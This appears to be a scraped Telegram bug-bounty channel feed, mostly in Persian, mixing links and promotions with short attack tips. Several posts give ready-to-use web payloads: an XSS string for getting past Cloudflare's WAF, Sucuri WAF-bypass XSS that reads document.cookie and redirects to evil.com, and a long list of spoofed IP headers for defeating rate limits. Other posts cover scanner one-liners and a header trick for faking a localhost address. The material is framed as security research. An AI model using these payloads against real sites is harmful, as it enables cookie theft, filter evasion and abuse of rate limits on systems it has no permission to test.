یک نفر اومده با بازی شطرنج بین دوتا بات یک روش استگانوگرافی ابداع کرده..
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://yangx.top/rootdr_research
#Link
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://yangx.top/rootdr_research
#Link
X (formerly Twitter)
javad (@First_javad) on X
یه برنامهنویس ۱۸ ساله اهل انگلیس به اسم wilson اومده یه کار خیلی فان با سایتهای آنلاین شطرنج انجام داده. در حقیقت تونسته یه ربات بسازه که با بازی شطرنج میشه یه فضای کاملا رایگان و نامحدود داشت برای آپلود هرچیزی که دوست دارید :)
#رشتو
#رشتو
❤2
CAPTCHA Bypass Methods
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#BugBounty
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#BugBounty
👍4❤2🔥2
Forwarded from sn0whacks
🔥پیلود XSS برای دور زدن CloudFlare WAF:
‘>alert(154)</script><script/154=’;;;;;;;
@sn0whacks
#bugbountyTips
@sn0whacks
#bugbountyTips
👍12
Forwarded from 🔴 خبر فوری | اخبار لحظه ای | اخبار جنگ (Dirin)
This media is not supported in your browser
VIEW IN TELEGRAM
👍12🔥1
Use Akamai-Client-Ip instead of XFF to override YOUR IP to 127.0.0.1
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#bugbounty
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#bugbounty
🔥8
Rate Limit Bypass using HTTP Headers
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#bugbounty
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#bugbounty
Telegram
Bugbounty Tips
research and sharing in cybersecurity
❤7🔥2
this will help you to Bypass csp
http://cspbypass.com/
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#bugbounty
http://cspbypass.com/
For more join to channel (:
https://yangx.top/rootdr_research
#Web
#Payloads
#bugbounty
بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه
پ.ن: ASIS خشن مینوازد😂😂
پ.ن: ASIS خشن مینوازد😂😂
یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و درحال تغییره و بنظرم پروژه خوبیه حتما ازش استفاده کنید.
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیازها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io
For more join to channel (:
https://yangx.top/rootdr_research
#bugbounty
#web
#Pentest
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیازها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io
For more join to channel (:
https://yangx.top/rootdr_research
#bugbounty
#web
#Pentest
👍13❤3
یک چنل با محتوای بدرد بخور:
https://yangx.top/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
https://yangx.top/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
Telegram
Bugbounty Tips
research and sharing in cybersecurity
👍15🔥1
https://github.com/coffinxp/nuclei-templates
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
GitHub
GitHub - coffinxp/nuclei-templates
Contribute to coffinxp/nuclei-templates development by creating an account on GitHub.
👍5👎1🔥1
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
❤11👍3
Sucuri WAF Bypass:
payload:
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
payload:
<a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href="javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>
For more join to channel (:
https://yangx.top/rootdr_research
#LINK
#WEB
👍3👀2
Email-verification-bypass.mkv
56.6 MB
سلام دوستان برای Email Verification bypass یک ویدیو براتون آماده کردم که روی برنامه پابلیک هکروان بود
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass
For more join to channel (:
https://yangx.top/rootdr_research
#Video
#Writeup
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass
For more join to channel (:
https://yangx.top/rootdr_research
#Video
#Writeup
👍20❤8🤝2🔥1👏1